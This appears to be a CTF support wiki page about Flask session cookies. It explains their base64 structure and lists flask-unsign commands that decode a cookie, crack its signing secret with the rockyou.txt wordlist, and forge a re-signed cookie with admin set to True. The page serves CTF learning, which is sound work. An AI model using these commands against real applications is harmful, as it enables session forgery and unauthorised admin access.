CTF Support
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Back to homepage
  1. CTF Support
  2. /
  3. Web
  4. /
  5. Python
  6. /
  7. Flask
Edit page

Flask

Session cookies

Flask session cookies looks something like this:

eyJhZG1pbiI6ZmFsc2UsInVpZCI6InQxIn0.Y8MWdQ.2GDhtc5YkYsDn6rbJ5BA3XbZmYw

Where the first part is base64 encoded data. In this case {"admin":false,"uid":"t1"}.

flask-unsign

To decode, sign and unsign the session cookies, flask-unsign can be used.

flask-unsign -d -c eyJhZG1pbiI6ZmFsc2UsInVpZCI6InQxIn0.Y8MWdQ.2GDhtc5YkYsDn6rbJ5BA3XbZmYw

flask-unsign -u -c eyJhZG1pbiI6ZmFsc2UsInVpZCI6InQxIn0.Y8MWdQ.2GDhtc5YkYsDn6rbJ5BA3XbZmYw
-w rockyou.txt --no-literal-eval

flask-unsign -S <secret> -s -c "{'admin': True, 'uid': 't1'}"